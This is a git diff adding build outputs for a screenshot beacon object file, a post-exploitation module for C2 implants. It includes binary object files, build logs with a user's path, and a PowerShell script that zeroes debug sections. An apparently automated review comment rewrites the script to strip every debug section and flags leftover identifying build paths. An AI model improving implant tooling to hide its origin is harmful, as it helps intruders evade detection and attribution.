diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..6ca20fed7b38cafa74ecf348d4be0cd5884306ae GIT binary patch literal 26542 zcmds=-EJaB5QY0XQr^Lr$&D4SR~v8cFksBW06T!OEfn7WC6b)4%VTCRmR5Lo`@}+q zf$5n!T~%FwUETiopTAQ-{gt+9ot9~sYQ1muxk|UGmu5O1qn?$qX9 zR}RxcZO1xC+rB;r`OHpjxYtm>_jK)6?bhj9M`N|x>P%nfhxz9y9g$7=JS-|qD5R>yO_rn-{*FQ0zBNFRmsL;5qn zf7V?tbg!*w4K=oz_B<=FZJ$4Bb*UFmoa$*~T|dy#wAI@~iY|qQdkyvcOFa`zkD>+r ze|hz{(yIHEvoy*5rkBwZ`Vko6PW*Z<^yfN%B^;lGgzw0BrT6ar&P9Q}jQo5|NIzp` zDC#!YdXn35mNVpJDyll7TnKkx+~`T(V^nyeU5c_3{qc_8s!yb5`7wJa>7j$sz^BQF zUysmab=Ga@;!50lFFjjkz5ZT$gB3#SVr|h~9HaZO_3x#Rcj`^pd#u+fR>E(5VVwu+ zS1p}=TA#Ys^DWl+nB@z4dm)31vuCdXOXr1eDQ{t@@dt0~jCGX#ty3iSM{)N!#@#dK z{>e7%XCub%c9haV=6(1#duqE$>OdaYPV_@g-LST!gPDOmuCp(+QdGd`c*vu?G(X#z zh=|cU#L2F>cGBBE)azQjiKtggn+)YMxsF(}BV=(_dLI<$a+iLioRuK1bFj(#kqWUXx+`mR7iQ=pza4&s z7gs0JBbENb+jg)w`x%SI7xSW6o0olAYVv}2#pNwxxpwBpg?fQ3sPGJi9vvBJFP9V=dk!@t=&j(@G*P!Bz%um#qIpK_|Cg^$d zEPoz6Zs+ivC>Heq*mvf5oRGDpjNAwHa@cxoDHRNX)gv+uuksjTKa^iYNg^yC?b1e6 zK6ezn+=xmW)gyj1lrt)Gsn3lnU+jhxHyM#pZ4@=HO*HR>vGFvS%R`%ZX})%CE|tP) zKe#=5)_NW`?a(XmMS3Wc$l^kLCj+*U1mH0+jy&iZz7#JC_St<_*tpC$5GN8lHZt#I zW!p2oPCBgd@X-2U14>K%OGIw-T0tjPK)K~xk0Eo3B939ZH1RS*@4sc0P23??9kOcf zt*gBP3t4H_1v-sMJTix>8f;K_hm6FT6^-zqSBjY@#Zh&A2v)?R=S#~|7gaykLgF`< z#uc_FYBQa%RI)TKc%~ZtE*{@h>vUO7Nalj|4IVUNopU>H;f4xJT-ng7ujtRoQ-^!3 zXzyF2a`EaG(o8+&;;_N7#>kDAUO5lP*pxYk*a3lEE?61wGaoWjcK0Peg6GonAefHRJ{cUXVP2cbC1WU)l@;0_lb|8V|7(jkCYw*;jx2} z^=M6Po(HNJPt;+Ih1K8zgqc>RR?4UQ=7Moh8sFL*HB-KGsue=8lREn8P zmmCr`m|t=oCUrd?9E%)jqYqp>2u2z^t58kAY9DGJ%hRht1>g8IBADkUvp&%u^S6yo@<0~4dz`hA z7qY(QDcS$mWmYgO%2aEnU91U`)#jgvM73qz15wm=Gbe(k^OADbJp?WfTCub0RNB+0 zA}4%ZCmP{#)T-tUxpLX5fSQGSajtxv88J$C)OkpEQ}Ia^_NhB)eZM?L&?)Rnm3343 zy1Z_VAgZ2;0>-k&UNw60p9VbSiX6(liLZ(8>rx#QYkqd34i<%I$iX9T;@ybR$j_CR zq6X7z5t=v3Jtg5az5{zp9BQ*>T@L?4&EQQ@o=Ot<9H9uvwSJt3T 
zUWuCNy-qT^GCM`xnHsubRk+cO%*al!mTZ8Ptfjk3CNkwL&wIn(Om5JDDUiw#3-^_G z+!Z-xf=3;{(BD|(mQ=rMLv4B1S~3009|nB(SWCK49X5;S2hQGpM(wn%4nJK)__?}R E03ujRegFUf literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..0f1e4ec --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log new file mode 100644 index 0000000..242f4fc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog 
diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe new file mode 100644 index 0000000..b68b3d1 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32 + + + + \ No newline at end of file 
diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj new file mode 100644 index 0000000000000000000000000000000000000000..b128ff87f260bb6f6e5bd14a7da7c12418f8f413 GIT binary patch literal 4153 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 A&;S4c literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/resources/strip_bof.ps1 b/ScreenshotBOF/resources/strip_bof.ps1 new file mode 100644 index 0000000..059809a --- /dev/null +++ b/ScreenshotBOF/resources/strip_bof.ps1 
@@ -0,0 +1,127 @@
+function strip-bof {
+<#
+.SYNOPSIS
+ Removes debug symbols from a beacon object file
+
+ Heavily dependent on code by Matthew Graeber (@mattifestation)
+ Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1
+ Author: Yasser Alhazmi (@yas_o_h)
+ License: BSD 3-Clause
+
+.PARAMETER Path
+
+ Specifies a path to one or more object file locations.
+
+.EXAMPLE
+
+ C:\PS>strip-bof -Path main.obj
+
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter(Position = 0, Mandatory = $True)]
+ [ValidateScript({ Test-Path $_ })]
+ [String]
+ $Path
+ )
+
+
+ $Code = @'
+ using System;
+ using System.IO;
+ using System.Text;
+
+ namespace COFF
+ {
+
+
+ public class SECTION_HEADER
+ {
+ public string Name;
+ public uint PhysicalAddress;
+ public uint VirtualSize;
+ public uint VirtualAddress;
+ public uint SizeOfRawData;
+ public uint PointerToRawData;
+ public uint PointerToRelocations;
+ public uint PointerToLinenumbers;
+ public ushort NumberOfRelocations;
+ public ushort NumberOfLinenumbers;
+ public uint Characteristics;
+ public Byte[] RawData;
+
+ public SECTION_HEADER(BinaryReader br)
+ {
+ this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0];
+ this.PhysicalAddress = br.ReadUInt32();
+ this.VirtualSize = this.PhysicalAddress;
+ this.VirtualAddress = br.ReadUInt32();
+ this.SizeOfRawData = br.ReadUInt32();
+ this.PointerToRawData = br.ReadUInt32();
+ this.PointerToRelocations = br.ReadUInt32();
+ this.PointerToLinenumbers = br.ReadUInt32();
+ this.NumberOfRelocations = br.ReadUInt16();
+ this.NumberOfLinenumbers = br.ReadUInt16();
+ this.Characteristics = br.ReadUInt32();
+ }
+ }
+
+
+ public class HEADER
+ {
+ public ushort Machine;
+ public ushort NumberOfSections;
+ public uint TimeDateStamp;
+ public uint PointerToSymbolTable;
+ public uint NumberOfSymbols;
+ public ushort SizeOfOptionalHeader;
+ public ushort Characteristics;
+
+ public HEADER(BinaryReader br)
+ {
+ this.Machine =
br.ReadUInt16();
+ this.NumberOfSections = br.ReadUInt16();
+ this.TimeDateStamp = br.ReadUInt32();
+ this.PointerToSymbolTable = br.ReadUInt32();
+ this.NumberOfSymbols = br.ReadUInt32();
+ this.SizeOfOptionalHeader = br.ReadUInt16();
+ this.Characteristics = br.ReadUInt16();
+ }
+ }
+}
+'@
+
+ Add-Type -TypeDefinition $Code
+ Write-Host "enumerating sections..."
+ try {
+ $FileStream = [IO.File]::OpenRead($Path)
+ $BinaryReader = New-Object IO.BinaryReader($FileStream)
+ $CoffHeader = New-Object COFF.HEADER($BinaryReader)
+
+ # Parse section headers
+ $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
+
+ for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++)
+ {
+ $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
+
+ if($SectionHeaders[$i].Name.Contains("debug")){
+ Write-Host "found debug section.. zeroing it..."
+ $FileStream.Close();
+ $FileStream2 = [IO.File]::OpenWrite($Path)
+ $FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null
+ for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){
+ $FileStream2.WriteByte(0)
+ }
+ Write-Host "closing stream...";
+ $FileStream2.Close();
+ Write-Host "done!";
+ return;
+ }
+ }
+ } catch {
+ Add-Type -AssemblyName PresentationFramework
+ [System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString());
+ return;
+ }
+}
\ No newline at end of file
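Review bot: The `return;` inside the section loop, together with the `$FileStream.Close()` just before it, means only the first section whose name contains "debug" is ever zeroed; MSVC objects commonly carry more than one such section (`.debug$S` and `.debug$T`), so the rest survive the "strip", and had the loop continued it would be reading section headers from a stream that was already closed. The fix is to parse every section header first, then open the file for writing once and zero each matching section; the read stream should also be closed in a `finally`, since the no-debug path and the `catch` path currently leave `$FileStream` open. Note too that zeroing `.debug$*` raw data does not touch the COFF symbol and string tables, which likely still carry the build path (the committed build log embeds `C:\Users\Ethan\...`), so the script should not be relied on to remove every identifying string until that is confirmed. The rewrite below replaces the body of the `try` block; the `Add-Type` call and the `catch` handler are unchanged.
```powershell
    # … unchanged: Add-Type -TypeDefinition $Code / Write-Host "enumerating sections..." …
    try {
        $FileStream = [IO.File]::OpenRead($Path)
        $BinaryReader = New-Object IO.BinaryReader($FileStream)
        $CoffHeader = New-Object COFF.HEADER($BinaryReader)

        # Read every section header before modifying the file
        $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
        for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++) {
            $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
        }
        $BinaryReader.Close()
        $FileStream.Close()

        # Zero every debug section, not just the first one found
        $FileStream2 = [IO.File]::OpenWrite($Path)
        try {
            foreach ($Section in $SectionHeaders) {
                if ($Section.Name.Contains("debug") -and $Section.SizeOfRawData -gt 0) {
                    Write-Host "found debug section $($Section.Name).. zeroing it..."
                    $FileStream2.Seek($Section.PointerToRawData, 'Begin') | Out-Null
                    $Zeros = New-Object byte[] $Section.SizeOfRawData
                    $FileStream2.Write($Zeros, 0, $Zeros.Length)
                }
            }
        } finally {
            $FileStream2.Close()
        }
        Write-Host "done!"
    } catch {
        # … unchanged: MessageBox error report …
    } finally {
        if ($FileStream) { $FileStream.Close() }
    }
```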
diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj new file mode 100644 index 0000000000000000000000000000000000000000..6f339ac2787c9b38f6753998d22f77b7e5c04a07 GIT binary patch literal 5239 zcmds5eQaA-6~C_CHME69l&%@9^eua(X*;=Yyk%}wHh(-P&-5j+VrR`*isO%$#;ao+ z`=#|z#Zr<@D``Z9&_odk5Yrd}v?0cpL_;{NXqzb27)*;0NF8EgXsbX1jS30M@7(*I zzg{-9f4P$1`Q6_+_ndRjz3=+Hmw9*-yZoPcx^F9EcQMi2nUbD1PU>cttpeQUuzIH4 z+`-%#JvDP&j#-*DfU7Nbe%29mmoiBsX<0G$Gr(VLsP_r^ncwd=^ok)*=Pk{@HZnHv zWbE@F5X?aciA5*em1ci8gP+=BjS|w&Jbrhv*-nOP9(GTdw&a%ErKe7mdvC8f@BwW= zJ(}8P#FnH3O1M8Ts>QWPu&--oCYy2RvZ=0jrTYUBEz&<2i46wgA+@h75gLgnVsRxh zoQTAR6GtOTI1!76Ly`VScqH~oPm8C~vR?A`tP^4&lU;9hp$zGG56Sw5j>q?Dda7xI!(kcy>j z-YBO_x}KMk`HWOfp45rYWXmVa+T6GQm=qZR(k~pMXboaXb0-zI2_-Weptx&nj|!d9bk?T^?%e zR+fhwyQdd0U_p~B`(IpG#o%%Dqv)SD`(suN70M|Unkf;8`V$JQ#}?x9c#EQ_g2Y9W zCoJoE`8?vjpvZoSU1Agk4tx|H(xU=Qk;`uK2q`HTJRbH|y{|O5IXf@U!i$xY>6>CL z(`h04Cfi&hbrDAe3I`95kX-nRDK)wHCfBss!+;WQ2;Kza@|2YY@kKM}nTxbM&tGb3 z3f4~2Fs;t|O3uAav!}Us)9j-(dp>JbL)ULE@$v`ZPdN8h)wzp4n{NuG*4*B66kFsP z#-P$s2$Ex_95>|zN%aL$OTuCAOQOacXe;ecitQ6` zu$?a@DAvM74oxt5KVmIxVa%&dV>Ovm)W5E}WA);7nwK z^r_U{_$|!KzlFfk{y_BBApW_A{!;*E{CW9lblRUq9+S{KgAQCQK~MvHP9TESI=oni zm+J6Ef=GqCLs}G`mtd~CYwpUG3v++mJ&`7FojT)2YNmRx2J}!3UAn@=lHZtue2zQUXjBrjWP}fc=0JR z5sfzWEk#F#T1(c72-%G>ZIBY(+G2~Y0QqSjbRuNEKt&b1sCa#5lehYpRhTRVaRSmR zpGU{4J0{fDi|pxy8;9=8(0Qw5^=J)!)wG|h_JaQ!dMYIV$+SfrW`QNX_ZRDDgLUIK znbEO`BN1l=P1!O*+K<4InRZLBW+p0j=HfM&CO-50HV8aeFcPjd!sx;rbDdXdBUghKv0a*Bd!=%akLlcqZ}OoqAXmj z7lXN zVnDk&Hwi?wcCqgP?cwNGHSJnW`v#E6e#b_}_H(;$0Nut>wT3PO(VgpJzX#gO(Vv0# zapdUOz&ae;nPZ28?MUHx+2&%~9J|=o;+6>*u%}QDt7#U1{2gXvwF3Z7_-9NYs^9IL zqm}V+M3oeXc7%^}wC42e?BrDwNJ77lbBB*T^WE3}@ss@{`>Nkxy{G+_ih3${Yxa#- zUwtL{Z)N-I4_B^w29HD?owMIQdFsgHzkC{lc=M+V(?xeS^Xz9gI<8+Q@BT?WX}CR} z^Nh_3rtwXJCg^mmnxpHY@ht)i3!AmN(nO7K5L6JSgWe&i{b}P{w1{YOY~WDOA>W;Z zxeaH$o*o~~zmd74S88SM9BXBKv#rb_%**uC_@+YZ;dIcu3RTwSe~lK$Y^1Z=26nt) zVcI1UquGjk)8Yj~_r28wqgq`^!5p_SU$imbu`%?&Xf@&I*H#x&FjsBNmWI74Z1&ig 
z!!{;nV{$g;3pVEKHs;4R=CX}>)5bVOqI@m_?zAyJ8#82M=uEPjfb%xyn>J>}#{33M z6_a*isXhK^-yZ~`>&>+N z(YOt3d@sHMtkWUmN+<7)tB2_~r^AP9b9)^l5{c||F%jhNYy2f_(xk*&u{@v~u?NbAK0T-#rEI!v(<&j8 z8c-tM9ywIP>7<8nXeEtoDyRPsb&$W}HF=2XIeZrxPTh}dlLEHEoJE=G4Hxx%D3>j! z3dvHYIk)h1(RkopbTQqiX%zZuBFbPo4dn`Dy{2!hnp~sOiheSi)!~Q~2v)|*xF!B*9;sOwwCMWrQJ^(zUV0TD3UYQ8 z-&y_HoNg<_(NfmXNyF|=@DC0Ny;Lfc{Qi3bYBU^BRL`gUpJsQ*@L@p>M&g5kXuLq? ymcgjWCK7&sG#pf5EYIXmW%C&s|0Xj3z{QbCzE>2}`aMl7H}5MUk;VI(#D4*F4HD@9 literal 0 HcmV?d00001 
diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj new file mode 100644 index 0000000000000000000000000000000000000000..d9e59fd2959b0b1f5a04d9a9137afecf1873100a GIT binary patch literal 4153 zcmds4TWnNC7@pFyR4BAjRJ?Mm1&YOW*sdlAvVvX@iX!?wHbo{~aR zsjd%fjy0MP#Y7VyG#Wz!4{}joT188|B#1SZq?*Q*q=YrDq0v56>pwH+vfWeTyOZq9 zcfS8J|NQgM**V^d<>>O?!C3Gngtj8qtnrK(lMjjNBN_!TsXb`p$~t6?i_!l54FQds z0PuE&_QXaW)j6%1ctnmE{5gRA%Zz7&cx2o>-EHuv|j0 z%uAQoz0)D!Ks~o;LI0zN#tm66B6Az!o40cSZ37!@t;qp|+@65X>)4H+eP9n4jARdr zaV{!GVyQk(PI2i>qEF7oGNRbWMf&1gHgZTLd_0jo2)TK-X%FWkDgmZK#Bm~zCgk2o z+G@2T#H_OiQnEGLn=Y|Y-7;0`nVOdAhm=CDU^_rILP86-k}-FoTJkcO#|25yU{Tts z!6~UrgOduLYQlv)o>qj(CZU)YW;926Jg0=_{F>&xf@ge+Fx_2B&MJ5o$oXzfYy1F* zzClW;=vQz7By*rX19;jeL4>86m$Z49sS=v?OUoE$efg@!FgeXg!4u$jwtGfhY`K~e z8i)DjeX3hMHWIcrC5c*uQvfvb#&Fo@Ja$gn7@7}5YA;W^0U#oN}x{X@f7SX6xy)2uCZHkYHOcRLKAv<6+ed8 zBO2}>QU;4R-jixIrSaV0IFcK+og*28u*Yd>X*$zJl8CTK>H|t}*uAn5;OTB4VdX}i zbA!`J-Y8Wpu4Y3{_CT8u_G<{CYH69abv!8yZRSF5u&~g-qIu-nixB;Jr$F~+L=nh} zVg8mpo`i#y7d~sg+>;M|**pSyy$IpuMqBd2R}vZyUGht7hVcjlT2MEhu?n69t_XEl zP^Tl6&n8xc302pS(!vPuRiL2BpA*TZ1=T`dN70?o-%Qa49ocmBsE(cnbPN0}i2T{E zrRWIs-vHH6 zZXSAgAHs}PP*1BVR|AOY-2;fty9vdX6xji7 zqNr1s`gQ4EKrH$rfSRb@cYwA~bWKM$0Fk3=L4N_-OwkHB@()n-*q*cR|2TW5spiVu z54FeJ?b)dhpFeyR^|T~6{qb|dMK37P#>Y~Ow17z^SX&S zZDPJPG2{$sjm2YO10@-}-^4gfOxVN>nwU3C%vlrjy@~nV#MF^;QyUXL2#gO_V(dFP z!9zMzdfQ(PmX#Icgf4Dbun30}z3Fh+NiU4_CfK8K>|Wl`A}hid*&!0CgHQHD=I0sKi)0em7PojP5ffdJbhg|j2$?^y)ARWx z_V2`A*qe@IDjG>TlF3xeFf5aLQ?Y|a=JY88GVn`>$~MXuf#u6$$+XPYFGiAyBcdiQ zTP9hI2X-^d+x6s>1r+Loa7#ie6Su<`juEdeq